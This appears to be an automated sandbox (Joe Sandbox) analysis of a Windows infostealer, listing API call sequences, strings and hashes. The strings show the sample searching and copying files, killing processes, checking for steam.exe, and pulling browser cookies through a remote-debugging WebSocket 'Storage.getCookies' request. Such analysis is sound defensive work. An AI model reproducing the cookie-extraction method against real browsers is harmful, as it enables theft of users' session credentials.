                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B133A
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B135C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1376
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B13E2
                                • lstrlen.KERNEL32(006D1794), ref: 006B13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B140A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1416
                                • lstrlen.KERNEL32(?), ref: 006B1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B147A
                                • StrCmpCA.SHLWAPI(?,0133D828), ref: 006B14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1535
                                • StrCmpCA.SHLWAPI(?,0133DBC0), ref: 006B1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B15E4
                                • StrCmpCA.SHLWAPI(?,0133D798), ref: 006B1602
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1633
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B165C
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1685
                                • StrCmpCA.SHLWAPI(?,0133D678), ref: 006B16B3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B16F4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B171D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1745
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B181C
                                • FindClose.KERNEL32(00000000), ref: 006B182B
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 018c5b6d728160a3838a2a1f906a37bd0997ccecba6e63b3086e8f0e64db61f2
                                • Instruction ID: 0b10941879d7a8d4c3d992c42bf35848cbcc890b745f8abb9f252ee08eb9f150
                                • Opcode Fuzzy Hash: 018c5b6d728160a3838a2a1f906a37bd0997ccecba6e63b3086e8f0e64db61f2
                                • Instruction Fuzzy Hash: FF1283B1A11216ABCB20EF79D869AEF77B6BF45300F44452DF84A97250EB34DC418B90
                                APIs
                                • wsprintfA.USER32 ref: 006BCBFC
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BCC13
                                • lstrcat.KERNEL32(?,?), ref: 006BCC5F
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BCC71
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BCC8B
                                • wsprintfA.USER32 ref: 006BCCB0
                                • PathMatchSpecA.SHLWAPI(?,01339368), ref: 006BCCE2
                                • CoInitialize.OLE32(00000000), ref: 006BCCEE
                                  • Part of subcall function 006BCAE0: CoCreateInstance.COMBASE(006CB110,00000000,00000001,006CB100,?), ref: 006BCB06
                                  • Part of subcall function 006BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 006BCB46
                                  • Part of subcall function 006BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 006BCBC9
                                • CoUninitialize.COMBASE ref: 006BCD09
                                • lstrcat.KERNEL32(?,?), ref: 006BCD2E
                                • lstrlen.KERNEL32(?), ref: 006BCD3B
                                • StrCmpCA.SHLWAPI(?,006CCFEC), ref: 006BCD55
                                • wsprintfA.USER32 ref: 006BCD7D
                                • wsprintfA.USER32 ref: 006BCD9C
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006BCDB0
                                • wsprintfA.USER32 ref: 006BCDD8
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BCDF1
                                • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 006BCE10
                                • GetFileSizeEx.KERNEL32(00000000,?), ref: 006BCE28
                                • CloseHandle.KERNEL32(00000000), ref: 006BCE33
                                • CloseHandle.KERNEL32(00000000), ref: 006BCE3F
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006BCE54
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BCE94
                                • FindNextFileA.KERNEL32(?,?), ref: 006BCF8D
                                • FindClose.KERNEL32(?), ref: 006BCF9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                                • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 3860919712-2388001722
                                • Opcode ID: ca55a7ed672859678d5ba3834c86410f320ae1198a9ea83874f83af870e483d8
                                • Instruction ID: cce91899b20548e076f872884ed07d5138df165f18238b9afae82d71c9c2fec5
                                • Opcode Fuzzy Hash: ca55a7ed672859678d5ba3834c86410f320ae1198a9ea83874f83af870e483d8
                                • Instruction Fuzzy Hash: 6DC14FB1A11219ABDB60EF64DC45EEE777ABF84310F044599F509A7290EE30AF85CF50
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B12BF
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B12E7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B133A
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006B135C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006B1376
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B13E2
                                • lstrlen.KERNEL32(006D1794), ref: 006B13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B140A
                                • lstrcat.KERNEL32(00000000,006D1794), ref: 006B1416
                                • lstrlen.KERNEL32(?), ref: 006B1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1443
                                • lstrcat.KERNEL32(00000000,?), ref: 006B1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B147A
                                • StrCmpCA.SHLWAPI(?,0133D828), ref: 006B14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B1535
                                • StrCmpCA.SHLWAPI(?,0133DBC0), ref: 006B1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B15E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B1796
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B17BE
                                • lstrcpy.KERNEL32(00000000,?), ref: 006B17F5
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006B181C
                                • FindClose.KERNEL32(00000000), ref: 006B182B
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                • String ID:
                                • API String ID: 1346933759-0
                                • Opcode ID: 5bf62aba578027278d7678fe373d9ddaccd5ab63818cd62ab9f738ac373e346d
                                • Instruction ID: 9f62889e22ace49fcdde0558d9b443860308ac71ae66757e510e8496b047b11c
                                • Opcode Fuzzy Hash: 5bf62aba578027278d7678fe373d9ddaccd5ab63818cd62ab9f738ac373e346d
                                • Instruction Fuzzy Hash: 35C191B1A11216ABCB21FF69DC69AEF77B6BF02300F44012DF84997651EB34DD418B90
                                APIs
                                • memset.MSVCRT ref: 006A9790
                                • lstrcat.KERNEL32(?,?), ref: 006A97A0
                                • lstrcat.KERNEL32(?,?), ref: 006A97B1
                                • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 006A97C3
                                • memset.MSVCRT ref: 006A97D7
                                  • Part of subcall function 006C3E70: lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006C3EA5
                                  • Part of subcall function 006C3E70: lstrcpy.KERNEL32(00000000,0133E748), ref: 006C3ECF
                                  • Part of subcall function 006C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,006A134E,?,0000001A), ref: 006C3ED9
                                • wsprintfA.USER32 ref: 006A9806
                                • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 006A9827
                                • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 006A9844
                                  • Part of subcall function 006C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C46B9
                                  • Part of subcall function 006C46A0: Process32First.KERNEL32(00000000,00000128), ref: 006C46C9
                                  • Part of subcall function 006C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006C46DB
                                  • Part of subcall function 006C46A0: StrCmpCA.SHLWAPI(?,?), ref: 006C46ED
                                  • Part of subcall function 006C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C4702
                                  • Part of subcall function 006C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C4711
                                  • Part of subcall function 006C46A0: CloseHandle.KERNEL32(00000000), ref: 006C4718
                                  • Part of subcall function 006C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 006C4726
                                  • Part of subcall function 006C46A0: CloseHandle.KERNEL32(00000000), ref: 006C4731
                                • lstrcat.KERNEL32(00000000,?), ref: 006A9878
                                • lstrcat.KERNEL32(00000000,?), ref: 006A9889
                                • lstrcat.KERNEL32(00000000,006D4B60), ref: 006A989B
                                • memset.MSVCRT ref: 006A98AF
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 006A98D4
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A9903
                                • StrStrA.SHLWAPI(00000000,0133EDD0), ref: 006A9919
                                • lstrcpyn.KERNEL32(008D93D0,00000000,00000000), ref: 006A9938
                                • lstrlen.KERNEL32(?), ref: 006A994B
                                • wsprintfA.USER32 ref: 006A995B
                                • lstrcpy.KERNEL32(?,00000000), ref: 006A9971
                                • Sleep.KERNEL32(00001388), ref: 006A99E7
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A92E1
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A92FA
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A9399
                                  • Part of subcall function 006A92B0: strlen.MSVCRT ref: 006A93E6
                                  • Part of subcall function 006C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006C4759
                                  • Part of subcall function 006C4740: Process32First.KERNEL32(00000000,00000128), ref: 006C4769
                                  • Part of subcall function 006C4740: Process32Next.KERNEL32(00000000,00000128), ref: 006C477B
                                  • Part of subcall function 006C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C479C
                                  • Part of subcall function 006C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 006C47AB
                                  • Part of subcall function 006C4740: CloseHandle.KERNEL32(00000000), ref: 006C47B2
                                  • Part of subcall function 006C4740: Process32Next.KERNEL32(00000000,00000128), ref: 006C47C0
                                  • Part of subcall function 006C4740: CloseHandle.KERNEL32(00000000), ref: 006C47CB
                                • CloseDesktop.USER32(?), ref: 006A9A1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                                • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                • API String ID: 958055206-1862457068
                                • Opcode ID: 748f691bbb6c6bc26fe790ad85680d7739b2ca9c9c44f6fbe04ceb262f8ef2e7
                                • Instruction ID: f75b899a6761b14481a999f4b304dcd6129d7595cee0ca1e146a9dda14dd05b5
                                • Opcode Fuzzy Hash: 748f691bbb6c6bc26fe790ad85680d7739b2ca9c9c44f6fbe04ceb262f8ef2e7
                                • Instruction Fuzzy Hash: 1F9172B1A40218ABDB50EB64DC45FEE77B9FF48700F144199F609A7291DF70AE448FA4
                                APIs
                                • wsprintfA.USER32 ref: 006BE22C
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BE243
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BE263
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BE27D
                                • wsprintfA.USER32 ref: 006BE2A2
                                • StrCmpCA.SHLWAPI(?,006CCFEC), ref: 006BE2B4
                                • wsprintfA.USER32 ref: 006BE2D1
                                  • Part of subcall function 006BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 006BEE12
                                • wsprintfA.USER32 ref: 006BE2F0
                                • PathMatchSpecA.SHLWAPI(?,?), ref: 006BE304
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BE335
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BE347
                                • lstrcat.KERNEL32(?,?), ref: 006BE358
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BE36A
                                • lstrcat.KERNEL32(?,?), ref: 006BE37E
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BE394
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE3D2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BE422
                                • DeleteFileA.KERNEL32(?), ref: 006BE45C
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BE49B
                                • FindClose.KERNEL32(00000000), ref: 006BE4AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                • String ID: %s\%s$%s\*
                                • API String ID: 1375681507-2848263008
                                • Opcode ID: 7480e13432caf9463fcfac27f3d2e056fa0dbac2df626c05f86faf7da506963a
                                • Instruction ID: c1572c65b5d5dd94b5d4119821c74c91b633a9ae49361585f6b082669fe2f1f0
                                • Opcode Fuzzy Hash: 7480e13432caf9463fcfac27f3d2e056fa0dbac2df626c05f86faf7da506963a
                                • Instruction Fuzzy Hash: ED8161B1901219ABCB20EF65DC49EEE77BABF44300F044A99F54A97251EF35AE44CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A16E2
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006A1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A176C
                                • lstrcat.KERNEL32(00000000), ref: 006A1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006A17A2
                                • lstrcpy.KERNEL32(00000000,?), ref: 006A18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006A18FE
                                Strings
                                Similarity
                                • API ID: lstrcpy$lstrcat
                                • String ID: \*.*
                                • API String ID: 2276651480-1173974218
                                • Opcode ID: 74f6c2814685221ec19eed5fcae2b841cd7503cd6138a81f8f3fe1038437fb4e
                                • Instruction ID: a9bb9c72e9ce3ce990642e790c38926a38a74688c618df75211b8a03ad059635
                                • Opcode Fuzzy Hash: 74f6c2814685221ec19eed5fcae2b841cd7503cd6138a81f8f3fe1038437fb4e
                                • Instruction Fuzzy Hash: 73816D71A1121A9BCB21FF69D895AAFB7B6BF07700F040169F909AB261DB34DD01CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006BDD45
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006BDD4C
                                • wsprintfA.USER32 ref: 006BDD62
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BDD79
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BDD9C
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BDDB6
                                • wsprintfA.USER32 ref: 006BDDD4
                                • DeleteFileA.KERNEL32(?), ref: 006BDE20
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 006BDDED
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1557
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A1579
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A159B
                                  • Part of subcall function 006A1530: lstrcpy.KERNEL32(00000000,?), ref: 006A15FF
                                  • Part of subcall function 006BD980: memset.MSVCRT ref: 006BD9A1
                                  • Part of subcall function 006BD980: memset.MSVCRT ref: 006BD9B3
                                  • Part of subcall function 006BD980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006BD9DB
                                  • Part of subcall function 006BD980: lstrcpy.KERNEL32(00000000,?), ref: 006BDA0E
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,00000000), ref: 006BDA1C
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,0133ED88), ref: 006BDA36
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,?), ref: 006BDA4A
                                  • Part of subcall function 006BD980: lstrcat.KERNEL32(?,0133D708), ref: 006BDA5E
                                  • Part of subcall function 006BD980: lstrcpy.KERNEL32(00000000,?), ref: 006BDA8E
                                  • Part of subcall function 006BD980: GetFileAttributesA.KERNEL32(00000000), ref: 006BDA95
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BDE2E
                                • FindClose.KERNEL32(00000000), ref: 006BDE3D
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BDE66
                                • lstrcat.KERNEL32(?,0133D900), ref: 006BDE7A
                                • lstrlen.KERNEL32(?), ref: 006BDE84
                                • lstrlen.KERNEL32(?), ref: 006BDE92
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BDED2
                                Strings
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: be1f9ffbda4660692548cf02d53a3f5a156a078c9430080ff61ab69a159c8885
                                • Instruction ID: b45cb1b7e7f737dff3b85d68587330b4d2f6075ade446f00b57f2111b7d55f33
                                • Opcode Fuzzy Hash: be1f9ffbda4660692548cf02d53a3f5a156a078c9430080ff61ab69a159c8885
                                • Instruction Fuzzy Hash: 3C6132B1A11209ABCB50EF74DC99AEE77BABF48300F0046A9F54597251EF34AE45CF50
                                APIs
                                • wsprintfA.USER32 ref: 006BD54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 006BD564
                                • StrCmpCA.SHLWAPI(?,006D17A0), ref: 006BD584
                                • StrCmpCA.SHLWAPI(?,006D17A4), ref: 006BD59E
                                • lstrcat.KERNEL32(?,0133F480), ref: 006BD5E3
                                • lstrcat.KERNEL32(?,0133F430), ref: 006BD5F7
                                • lstrcat.KERNEL32(?,?), ref: 006BD60B
                                • lstrcat.KERNEL32(?,?), ref: 006BD61C
                                • lstrcat.KERNEL32(?,006D1794), ref: 006BD62E
                                • lstrcat.KERNEL32(?,?), ref: 006BD642
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BD682
                                • lstrcpy.KERNEL32(00000000,?), ref: 006BD6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 006BD737
                                • FindClose.KERNEL32(00000000), ref: 006BD746
                                Strings
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: b64236190eab4e1bae1d7b54c4642040aaca124ace46b84141e66fad94db2360
                                • Instruction ID: 7fed4d0d88bc4fa6c8c022b37ec79074c526a406ce3c2f74011fa8dfb228954d
                                • Opcode Fuzzy Hash: b64236190eab4e1bae1d7b54c4642040aaca124ace46b84141e66fad94db2360
                                • Instruction Fuzzy Hash: E46154B1911119ABCB20FF75DC89ADE77B9FF49300F0085A9E64997251EB34AE44CF90
                                Strings
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: e894c17a5ec18263333d8e907b9e255a987f897f0b477b7789fb2140697dde13
                                • Instruction ID: c31bef5fd108a408f584868b96721389060f6ee3d4681df5a6b5a16495086669
                                • Opcode Fuzzy Hash: e894c17a5ec18263333d8e907b9e255a987f897f0b477b7789fb2140697dde13
                                • Instruction Fuzzy Hash: E0A23771D012699FDB60DFA8C890BEDBBB6EF48300F1481AAD519A7241DB716E85CF90
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B23D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B23F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B2402
                                • lstrlen.KERNEL32(\*.*), ref: 006B240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 006B2436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B2486
                                Strings
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 66eede253aa8cd3b6c51cc2331081c3673d9664cefbab39497944087a218d229
                                • Instruction ID: 009bf78ff93243b36e3bc006093e4b5e5a5253ffdebde27ae1179e0fbeb10076
                                • Opcode Fuzzy Hash: 66eede253aa8cd3b6c51cc2331081c3673d9664cefbab39497944087a218d229
                                • Instruction Fuzzy Hash: 90416BB06512178BCB72FF29DCA5ADE73E6BF12300F005169F94A97A21DB349C418F94
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 006C46B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C46C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C46DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 006C46ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006C4702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006C4711
                                • CloseHandle.KERNEL32(00000000), ref: 006C4718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C4726
                                • CloseHandle.KERNEL32(00000000), ref: 006C4731
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: bb0006f548c681a32b2e9b44a1deb18cb56f9b648630de1c97473d14c439bac7
                                • Instruction ID: 52304b18bf7ceb914921251dee529c7a1fc48634e4051b6a93bcca0885606de5
                                • Opcode Fuzzy Hash: bb0006f548c681a32b2e9b44a1deb18cb56f9b648630de1c97473d14c439bac7
                                • Instruction Fuzzy Hash: DC016D31602524ABE7219B65AC8DFFA377DFB49B11F04029AF949A2180EF749D848A71
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 006C4628
                                • Process32First.KERNEL32(00000000,00000128), ref: 006C4638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 006C4660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006C4672
                                • CloseHandle.KERNEL32(00000000), ref: 006C467D
                                Strings
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: ea26dbdc534de05f311bbffd9f965fab98dd4afb39c9fb537f6a745116ea5cc4
                                • Instruction ID: 27e46961f8e37d512f170d6ad8a749bb1c2ba7cb7d13d6e8adfcfb7b127ad758
                                • Opcode Fuzzy Hash: ea26dbdc534de05f311bbffd9f965fab98dd4afb39c9fb537f6a745116ea5cc4
                                • Instruction Fuzzy Hash: 0001A271602124ABD720EB61AC49FEA77BDFF09350F0402DAED48D1140EF748D948BE1
                                APIs
                                • lstrcpy.KERNEL32(00000000,006CCFEC), ref: 006B4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 006B4B7F
                                • lstrlen.KERNEL32(006D4CA8), ref: 006B4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BA7
                                • lstrcat.KERNEL32(00000000,006D4CA8), ref: 006B4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006B4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 006B4BFA
                                Memory Dump Source
                                • Source File: 00000003.00000002.1375051399.00000000006A1000.00000040.00000001.01000000.00000004.sdmp, Offset: 006A0000, based on PE: true
                                 • Associated: 00000003.00000002.1375032381.00000000006A0000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000006D7000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000072E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.0000000000736000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.000000000074F000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375051399.00000000008D8000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375218507.00000000008EA000.00000004.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.00000000008EC000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000A72000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B53000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B7E000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B86000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375237078.0000000000B96000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375495211.0000000000B97000.00000080.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375609848.0000000000D37000.00000040.00000001.01000000.00000004.sdmp
                                 • Associated: 00000003.00000002.1375627095.0000000000D38000.00000080.00000001.01000000.00000004.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_6a0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 2891f02b69f24d22f7948feb2885a5926b7706af98573b4fb2d61f46241cdd67
